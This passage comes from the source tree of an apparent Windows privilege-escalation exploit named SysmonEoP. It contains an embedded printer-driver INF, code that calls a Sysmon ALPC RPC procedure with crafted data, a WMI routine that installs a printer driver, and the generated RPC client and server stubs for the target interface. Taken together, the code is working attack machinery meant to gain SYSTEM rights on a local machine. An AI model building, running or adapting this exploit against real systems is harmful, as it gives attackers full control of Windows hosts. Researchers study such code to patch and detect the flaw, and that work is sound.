OEM,PSCRIPT_DATA\"\n\n[DestinationDirs]\nDefaultDestDir=66000\nTest.CopyFiles=11\n\n[SourceDisksFiles]\nMSGENBW.PPD = 1\nTTY.DLL = 1\nTTYUI.HLP = 1\nGENIBM9W.GPD = 1\nTTY.INI = 1\nMSGENCOL.PPD = 1\nGENIBM9.GPD = 1\nOK9IBRES.DLL = 1\nTTYUI.DLL = 1\nTTYRES.DLL = 1\nTTY.GPD = 1\n\n[PrinterPackageInstallation.amd64]\nPackageAware=TRUE\nCoreDriverDependencies={D20EA372-DD35-4950-9ED8-A6335AFE79F0},{D20EA372-DD35-4950-9ED8-A6335AFE79F1}\nInboxVersionRequired=UseDriverVer\n\n[Strings]\n;Non-Localizable\n\n;Localizable\nDisk1=\"Windows Installation Disc\"\n\n[SourceDisksNames.x86]\n1 = %Disk1%,,,\"I386\"\n\n[SourceDisksNames.amd64]\n1 = %Disk1%,,,\"Amd64\"\n\n[SourceDisksNames.ia64]\n1 = %Disk1%,,,\"Ia64\"\n\n[SourceDisksNames.arm]\n1 = %Disk1%,,,\"arm\"\n\n[SourceDisksNames.arm64]\n1 = %Disk1%,,,\"arm64\"\n";
status = RpcStringBindingCompose(NULL, (RPC_WSTR)L"ncalrpc", NULL, (RPC_WSTR)alpc, NULL, &StringBinding);
status = RpcBindingFromStringBinding(StringBinding, &Binding);
status = RpcStringFree(&StringBinding);
RpcTryExcept
{
Proc1(Binding, 3036,data);
}
RpcExcept(EXCEPTION_EXECUTE_HANDLER);
{
printf("Error: %d\n",RpcExceptionCode());
}
RpcEndExcept
status = RpcBindingFree(&Binding);
}
LPWSTR BuildPath(LPCWSTR path) {
wchar_t ntpath[MAX_PATH];
swprintf(ntpath, L"\\??\\%s", path);
return ntpath;
}
BOOL AddPrinterDriverWmi() {
HRESULT hr;
hr = CoInitializeEx(0, COINIT_MULTITHREADED);
if (FAILED(hr))
{
CoUninitialize();
return FALSE;
}
hr = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL);
if (FAILED(hr))
{
CoUninitialize();
return FALSE;
}
IWbemLocator* pLoc = NULL;
hr = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID*)&pLoc);
if (FAILED(hr))
{
CoUninitialize();
return FALSE;
}
IWbemServices* pSvc = NULL;
hr = pLoc->ConnectServer(_bstr_t(L"ROOT\\StandardCimv2"), NULL, NULL, 0, NULL, 0, 0, &pSvc);
if (FAILED(hr)) {
pLoc->Release();
CoUninitialize();
return FALSE;
}
hr = CoSetProxyBlanket(pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE);
if (FAILED(hr)) {
pSvc->Release();
pLoc->Release();
CoUninitialize();
}
BSTR MethodName = SysAllocString(L"Add");
BSTR ClassName = SysAllocString(L"MSFT_PrinterDriver");
IWbemClassObject* pClass = NULL;
hr = pSvc->GetObject(ClassName, 0, NULL, &pClass, NULL);
IWbemClassObject* pInParamsDefinition = NULL;
hr = pClass->GetMethod(MethodName, 0, &pInParamsDefinition, NULL);
IWbemClassObject* pClassInstance = NULL;
hr = pInParamsDefinition->SpawnInstance(0, &pClassInstance);
VARIANT varCommand,varCommand2;
varCommand.vt = VT_BSTR;
varCommand.bstrVal = _bstr_t(L"Generic / Text Only");
varCommand2.vt = VT_BSTR;
varCommand2.bstrVal = _bstr_t(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf");
hr = pClassInstance->Put(L"Name", 0, &varCommand, 0);
hr = pClassInstance->Put(L"InfPath", 0, &varCommand2, 0);
IWbemClassObject* pOutParams = NULL;
hr = pSvc->ExecMethod(ClassName, MethodName, 0, NULL, pClassInstance, &pOutParams, NULL);
if (FAILED(hr))
{
VariantClear(&varCommand);
SysFreeString(ClassName);
SysFreeString(MethodName);
pClass->Release();
pClassInstance->Release();
pInParamsDefinition->Release();
pOutParams->Release();
pSvc->Release();
pLoc->Release();
CoUninitialize();
return FALSE;
}
return TRUE;
}
void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
return((void __RPC_FAR*) malloc(cBytes));
}
void __RPC_USER midl_user_free(void __RPC_FAR* p)
{
free(p);
}
================================================
FILE: v1/SysmonEoP/resource.h
================================================
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by FolderOrFileDeleteToSystem.rc
//
#define IDR_DLL1 101
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 107
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
================================================
FILE: v1/SysmonEoP/resource.rc
================================================
// Microsoft Visual C++ generated resource script.
//
#include "resource.h"
#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#include "winres.h"
/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
// English (United Kingdom) resources
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENG)
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_UK
#pragma code_page(1252)
#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//
1 TEXTINCLUDE
BEGIN
"resource.h\0"
END
2 TEXTINCLUDE
BEGIN
"#include ""winres.h""\r\n"
"\0"
END
3 TEXTINCLUDE
BEGIN
"\r\n"
"\0"
END
#endif // APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// RBS
//
IDR_DLL1 DLL "dll.dll"
#endif // English (United Kingdom) resources
/////////////////////////////////////////////////////////////////////////////
#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//
/////////////////////////////////////////////////////////////////////////////
#endif // not APSTUDIO_INVOKED
================================================
FILE: v1/SysmonEoP/sysmon.idl
================================================
[
uuid(1e72d56f-eec6-44d3-bbed-5caa50790812),
version(1.0),
]
interface DefaultIfName
{
long Proc0(
);
void Proc1(
[in]long arg_0,
[in][string] wchar_t* arg_1);
}
================================================
FILE: v1/SysmonEoP/sysmon_c.c
================================================
/* this ALWAYS GENERATED file contains the RPC client stubs */
/* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for sysmon.idl:
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
protocol : all , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#if defined(_M_AMD64)
#if _MSC_VER >= 1200
#pragma warning(push)
#endif
#pragma warning( disable: 4211 ) /* redefine extern to static */
#pragma warning( disable: 4232 ) /* dllimport identity*/
#pragma warning( disable: 4024 ) /* array to pointer mapping*/
#include <string.h>
#include "sysmon_h.h"
#define TYPE_FORMAT_STRING_SIZE 7
#define PROC_FORMAT_STRING_SIZE 79
#define EXPR_FORMAT_STRING_SIZE 1
#define TRANSMIT_AS_TABLE_SIZE 0
#define WIRE_MARSHAL_TABLE_SIZE 0
typedef struct _sysmon_MIDL_TYPE_FORMAT_STRING
{
short Pad;
unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];
} sysmon_MIDL_TYPE_FORMAT_STRING;
typedef struct _sysmon_MIDL_PROC_FORMAT_STRING
{
short Pad;
unsigned char Format[ PROC_FORMAT_STRING_SIZE ];
} sysmon_MIDL_PROC_FORMAT_STRING;
typedef struct _sysmon_MIDL_EXPR_FORMAT_STRING
{
long Pad;
unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];
} sysmon_MIDL_EXPR_FORMAT_STRING;
static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax =
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};
static const RPC_SYNTAX_IDENTIFIER _NDR64_RpcTransferSyntax =
{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};
extern const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString;
extern const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString;
extern const sysmon_MIDL_EXPR_FORMAT_STRING sysmon__MIDL_ExprFormatString;
#define GENERIC_BINDING_TABLE_SIZE 0
/* Standard interface: DefaultIfName, ver. 1.0,
GUID={0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}} */
extern const MIDL_STUBLESS_PROXY_INFO DefaultIfName_ProxyInfo;
static const RPC_CLIENT_INTERFACE DefaultIfName___RpcClientInterface =
{
sizeof(RPC_CLIENT_INTERFACE),
{{0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}},{1,0}},
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
0,
0,
0,
0,
&DefaultIfName_ProxyInfo,
0x02000000
};
RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcClientInterface;
extern const MIDL_STUB_DESC DefaultIfName_StubDesc;
static RPC_BINDING_HANDLE DefaultIfName__MIDL_AutoBindHandle;
long Proc0(
/* [in] */ handle_t IDL_handle)
{
CLIENT_CALL_RETURN _RetVal;
_RetVal = NdrClientCall3(
( PMIDL_STUBLESS_PROXY_INFO )&DefaultIfName_ProxyInfo,
0,
0,
IDL_handle);
return ( long )_RetVal.Simple;
}
void Proc1(
/* [in] */ handle_t IDL_handle,
/* [in] */ long arg_0,
/* [string][in] */ wchar_t *arg_1)
{
NdrClientCall3(
( PMIDL_STUBLESS_PROXY_INFO )&DefaultIfName_ProxyInfo,
1,
0,
IDL_handle,
arg_0,
arg_1);
}
#if !defined(__RPC_WIN64__)
#error Invalid build platform for this stub.
#endif
static const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString =
{
0,
{
/* Procedure Proc0 */
0x0, /* 0 */
0x48, /* Old Flags: */
/* 2 */ NdrFcLong( 0x0 ), /* 0 */
/* 6 */ NdrFcShort( 0x0 ), /* 0 */
/* 8 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */
/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */
/* 14 */ NdrFcShort( 0x0 ), /* 0 */
/* 16 */ NdrFcShort( 0x8 ), /* 8 */
/* 18 */ 0x44, /* Oi2 Flags: has return, has ext, */
0x1, /* 1 */
/* 20 */ 0xa, /* 10 */
0x1, /* Ext Flags: new corr desc, */
/* 22 */ NdrFcShort( 0x0 ), /* 0 */
/* 24 */ NdrFcShort( 0x0 ), /* 0 */
/* 26 */ NdrFcShort( 0x0 ), /* 0 */
/* 28 */ NdrFcShort( 0x0 ), /* 0 */
/* Return value */
/* 30 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */
/* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */
/* 34 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Procedure Proc1 */
/* 36 */ 0x0, /* 0 */
0x48, /* Old Flags: */
/* 38 */ NdrFcLong( 0x0 ), /* 0 */
/* 42 */ NdrFcShort( 0x1 ), /* 1 */
/* 44 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */
/* 46 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 48 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */
/* 50 */ NdrFcShort( 0x8 ), /* 8 */
/* 52 */ NdrFcShort( 0x0 ), /* 0 */
/* 54 */ 0x42, /* Oi2 Flags: clt must size, has ext, */
0x2, /* 2 */
/* 56 */ 0xa, /* 10 */
0x1, /* Ext Flags: new corr desc, */
/* 58 */ NdrFcShort( 0x0 ), /* 0 */
/* 60 */ NdrFcShort( 0x0 ), /* 0 */
/* 62 */ NdrFcShort( 0x0 ), /* 0 */
/* 64 */ NdrFcShort( 0x0 ), /* 0 */
/* Parameter arg_0 */
/* 66 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 68 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */
/* 70 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter arg_1 */
/* 72 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */
/* 74 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */
/* 76 */ NdrFcShort( 0x4 ), /* Type Offset=4 */
0x0
}
};
static const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString =
{
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x11, 0x8, /* FC_RP [simple_pointer] */
/* 4 */
0x25, /* FC_C_WSTRING */
0x5c, /* FC_PAD */
0x0
}
};
static const unsigned short DefaultIfName_FormatStringOffsetTable[] =
{
0,
36
};
#endif /* defined(_M_AMD64)*/
/* this ALWAYS GENERATED file contains the RPC client stubs */
/* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for sysmon.idl:
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
protocol : all , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#if defined(_M_AMD64)
#if !defined(__RPC_WIN64__)
#error Invalid build platform for this stub.
#endif
#include "ndr64types.h"
#include "pshpack8.h"
typedef
struct _NDR64_CONFORMANT_STRING_FORMAT
__midl_frag7_t;
extern const __midl_frag7_t __midl_frag7;
typedef
struct _NDR64_POINTER_FORMAT
__midl_frag6_t;
extern const __midl_frag6_t __midl_frag6;
typedef
NDR64_FORMAT_CHAR
__midl_frag5_t;
extern const __midl_frag5_t __midl_frag5;
typedef
struct
{
struct _NDR64_PROC_FORMAT frag1;
struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;
struct _NDR64_PARAM_FORMAT frag3;
struct _NDR64_PARAM_FORMAT frag4;
}
__midl_frag4_t;
extern const __midl_frag4_t __midl_frag4;
typedef
struct
{
struct _NDR64_PROC_FORMAT frag1;
struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;
struct _NDR64_PARAM_FORMAT frag3;
}
__midl_frag2_t;
extern const __midl_frag2_t __midl_frag2;
typedef
NDR64_FORMAT_UINT32
__midl_frag1_t;
extern const __midl_frag1_t __midl_frag1;
static const __midl_frag7_t __midl_frag7 =
{
/* *wchar_t */
{
/* *wchar_t */
0x64, /* FC64_CONF_WCHAR_STRING */
{
/* *wchar_t */
0,
0,
0,
0,
0,
0,
0,
0
},
(NDR64_UINT16) 2 /* 0x2 */
}
};
static const __midl_frag6_t __midl_frag6 =
{
/* *wchar_t */
0x20, /* FC64_RP */
(NDR64_UINT8) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
&__midl_frag7
};
static const __midl_frag5_t __midl_frag5 =
0x5 /* FC64_INT32 */;
static const __midl_frag4_t __midl_frag4 =
{
/* Proc1 */
{
/* Proc1 */ /* procedure Proc1 */
(NDR64_UINT32) 17039424 /* 0x1040040 */, /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasExtensions */
(NDR64_UINT32) 24 /* 0x18 */ , /* Stack size */
(NDR64_UINT32) 8 /* 0x8 */,
(NDR64_UINT32) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 2 /* 0x2 */,
(NDR64_UINT16) 8 /* 0x8 */
},
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
0x72, /* FC64_BIND_PRIMITIVE */
(NDR64_UINT8) 0 /* 0x0 */,
0 /* 0x0 */, /* Stack offset */
(NDR64_UINT8) 0 /* 0x0 */,
(NDR64_UINT8) 0 /* 0x0 */
},
(NDR64_UINT16) 0 /* 0x0 */ /* Notify index */
},
{
/* arg_0 */ /* parameter arg_0 */
&__midl_frag5,
{
/* arg_0 */
0,
0,
0,
1,
0,
0,
1,
1,
0,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* [in], Basetype, ByValue */
(NDR64_UINT16) 0 /* 0x0 */,
8 /* 0x8 */, /* Stack offset */
},
{
/* arg_1 */ /* parameter arg_1 */
&__midl_frag7,
{
/* arg_1 */
1,
1,
0,
1,
0,
0,
0,
0,
1,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* MustSize, MustFree, [in], SimpleRef */
(NDR64_UINT16) 0 /* 0x0 */,
16 /* 0x10 */, /* Stack offset */
}
};
static const __midl_frag2_t __midl_frag2 =
{
/* Proc0 */
{
/* Proc0 */ /* procedure Proc0 */
(NDR64_UINT32) 17301568 /* 0x1080040 */, /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */
(NDR64_UINT32) 16 /* 0x10 */ , /* Stack size */
(NDR64_UINT32) 0 /* 0x0 */,
(NDR64_UINT32) 8 /* 0x8 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 1 /* 0x1 */,
(NDR64_UINT16) 8 /* 0x8 */
},
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
0x72, /* FC64_BIND_PRIMITIVE */
(NDR64_UINT8) 0 /* 0x0 */,
0 /* 0x0 */, /* Stack offset */
(NDR64_UINT8) 0 /* 0x0 */,
(NDR64_UINT8) 0 /* 0x0 */
},
(NDR64_UINT16) 0 /* 0x0 */ /* Notify index */
},
{
/* long */ /* parameter long */
&__midl_frag5,
{
/* long */
0,
0,
0,
0,
1,
1,
1,
1,
0,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* [out], IsReturn, Basetype, ByValue */
(NDR64_UINT16) 0 /* 0x0 */,
8 /* 0x8 */, /* Stack offset */
}
};
static const __midl_frag1_t __midl_frag1 =
(NDR64_UINT32) 0 /* 0x0 */;
#include "poppack.h"
static const FormatInfoRef DefaultIfName_Ndr64ProcTable[] =
{
&__midl_frag2,
&__midl_frag4
};
static const MIDL_STUB_DESC DefaultIfName_StubDesc =
{
(void *)& DefaultIfName___RpcClientInterface,
MIDL_user_allocate,
MIDL_user_free,
&DefaultIfName__MIDL_AutoBindHandle,
0,
0,
0,
0,
sysmon__MIDL_TypeFormatString.Format,
1, /* -error bounds_check flag */
0x60001, /* Ndr library version */
0,
0x801026e, /* MIDL Version 8.1.622 */
0,
0,
0, /* notify & notify_flag routine table */
0x2000001, /* MIDL flag */
0, /* cs routines */
(void *)& DefaultIfName_ProxyInfo, /* proxy/server info */
0
};
static const MIDL_SYNTAX_INFO DefaultIfName_SyntaxInfo [ 2 ] =
{
{
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
0,
sysmon__MIDL_ProcFormatString.Format,
DefaultIfName_FormatStringOffsetTable,
sysmon__MIDL_TypeFormatString.Format,
0,
0,
0
}
,{
{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}},
0,
0 ,
(unsigned short *) DefaultIfName_Ndr64ProcTable,
0,
0,
0,
0
}
};
static const MIDL_STUBLESS_PROXY_INFO DefaultIfName_ProxyInfo =
{
&DefaultIfName_StubDesc,
sysmon__MIDL_ProcFormatString.Format,
DefaultIfName_FormatStringOffsetTable,
(RPC_SYNTAX_IDENTIFIER*)&_RpcTransferSyntax,
2,
(MIDL_SYNTAX_INFO*)DefaultIfName_SyntaxInfo
};
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif
#endif /* defined(_M_AMD64)*/
================================================
FILE: v1/SysmonEoP/sysmon_h.h
================================================
/* this ALWAYS GENERATED file contains the definitions for the interfaces */
/* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for sysmon.idl:
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
protocol : all , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif
#include "rpc.h"
#include "rpcndr.h"
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /* __RPCNDR_H_VERSION__ */
#ifndef __sysmon_h_h__
#define __sysmon_h_h__
#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif
/* Forward Declarations */
#ifdef __cplusplus
extern "C"{
#endif
#ifndef __DefaultIfName_INTERFACE_DEFINED__
#define __DefaultIfName_INTERFACE_DEFINED__
/* interface DefaultIfName */
/* [version][uuid] */
long Proc0(
/* [in] */ handle_t IDL_handle);
void Proc1(
/* [in] */ handle_t IDL_handle,
/* [in] */ long arg_0,
/* [string][in] */ wchar_t *arg_1);
extern RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec;
extern RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec;
#endif /* __DefaultIfName_INTERFACE_DEFINED__ */
/* Additional Prototypes for ALL interfaces */
/* end of Additional Prototypes */
#ifdef __cplusplus
}
#endif
#endif
================================================
FILE: v1/SysmonEoP/sysmon_s.c
================================================
/* this ALWAYS GENERATED file contains the RPC server stubs */
/* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for sysmon.idl:
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
protocol : all , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#if defined(_M_AMD64)
#if _MSC_VER >= 1200
#pragma warning(push)
#endif
#pragma warning( disable: 4211 ) /* redefine extern to static */
#pragma warning( disable: 4232 ) /* dllimport identity*/
#pragma warning( disable: 4024 ) /* array to pointer mapping*/
#include <string.h>
#include "sysmon_h.h"
#define TYPE_FORMAT_STRING_SIZE 7
#define PROC_FORMAT_STRING_SIZE 79
#define EXPR_FORMAT_STRING_SIZE 1
#define TRANSMIT_AS_TABLE_SIZE 0
#define WIRE_MARSHAL_TABLE_SIZE 0
typedef struct _sysmon_MIDL_TYPE_FORMAT_STRING
{
short Pad;
unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];
} sysmon_MIDL_TYPE_FORMAT_STRING;
typedef struct _sysmon_MIDL_PROC_FORMAT_STRING
{
short Pad;
unsigned char Format[ PROC_FORMAT_STRING_SIZE ];
} sysmon_MIDL_PROC_FORMAT_STRING;
typedef struct _sysmon_MIDL_EXPR_FORMAT_STRING
{
long Pad;
unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];
} sysmon_MIDL_EXPR_FORMAT_STRING;
static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax =
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};
static const RPC_SYNTAX_IDENTIFIER _NDR64_RpcTransferSyntax =
{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};
extern const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString;
extern const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString;
extern const sysmon_MIDL_EXPR_FORMAT_STRING sysmon__MIDL_ExprFormatString;
/* Standard interface: DefaultIfName, ver. 1.0,
GUID={0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}} */
extern const MIDL_SERVER_INFO DefaultIfName_ServerInfo;
extern const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable;
static const RPC_SERVER_INTERFACE DefaultIfName___RpcServerInterface =
{
sizeof(RPC_SERVER_INTERFACE),
{{0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}},{1,0}},
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
(RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable,
0,
0,
0,
&DefaultIfName_ServerInfo,
0x06000000
};
RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcServerInterface;
extern const MIDL_STUB_DESC DefaultIfName_StubDesc;
#if !defined(__RPC_WIN64__)
#error Invalid build platform for this stub.
#endif
static const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString =
{
0,
{
/* Procedure Proc0 */
0x0, /* 0 */
0x48, /* Old Flags: */
/* 2 */ NdrFcLong( 0x0 ), /* 0 */
/* 6 */ NdrFcShort( 0x0 ), /* 0 */
/* 8 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */
/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */
/* 14 */ NdrFcShort( 0x0 ), /* 0 */
/* 16 */ NdrFcShort( 0x8 ), /* 8 */
/* 18 */ 0x44, /* Oi2 Flags: has return, has ext, */
0x1, /* 1 */
/* 20 */ 0xa, /* 10 */
0x1, /* Ext Flags: new corr desc, */
/* 22 */ NdrFcShort( 0x0 ), /* 0 */
/* 24 */ NdrFcShort( 0x0 ), /* 0 */
/* 26 */ NdrFcShort( 0x0 ), /* 0 */
/* 28 */ NdrFcShort( 0x0 ), /* 0 */
/* Return value */
/* 30 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */
/* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */
/* 34 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Procedure Proc1 */
/* 36 */ 0x0, /* 0 */
0x48, /* Old Flags: */
/* 38 */ NdrFcLong( 0x0 ), /* 0 */
/* 42 */ NdrFcShort( 0x1 ), /* 1 */
/* 44 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */
/* 46 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 48 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */
/* 50 */ NdrFcShort( 0x8 ), /* 8 */
/* 52 */ NdrFcShort( 0x0 ), /* 0 */
/* 54 */ 0x42, /* Oi2 Flags: clt must size, has ext, */
0x2, /* 2 */
/* 56 */ 0xa, /* 10 */
0x1, /* Ext Flags: new corr desc, */
/* 58 */ NdrFcShort( 0x0 ), /* 0 */
/* 60 */ NdrFcShort( 0x0 ), /* 0 */
/* 62 */ NdrFcShort( 0x0 ), /* 0 */
/* 64 */ NdrFcShort( 0x0 ), /* 0 */
/* Parameter arg_0 */
/* 66 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 68 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */
/* 70 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter arg_1 */
/* 72 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */
/* 74 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */
/* 76 */ NdrFcShort( 0x4 ), /* Type Offset=4 */
0x0
}
};
static const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString =
{
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x11, 0x8, /* FC_RP [simple_pointer] */
/* 4 */
0x25, /* FC_C_WSTRING */
0x5c, /* FC_PAD */
0x0
}
};
static const unsigned short DefaultIfName_FormatStringOffsetTable[] =
{
0,
36
};
static const RPC_DISPATCH_FUNCTION DefaultIfName_table[] =
{
NdrServerCall2,
NdrServerCall2,
0
};
static const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable =
{
2,
(RPC_DISPATCH_FUNCTION*)DefaultIfName_table
};
#endif /* defined(_M_AMD64)*/
/* this ALWAYS GENERATED file contains the RPC server stubs */
/* File created by MIDL compiler version 8.01.0622 */
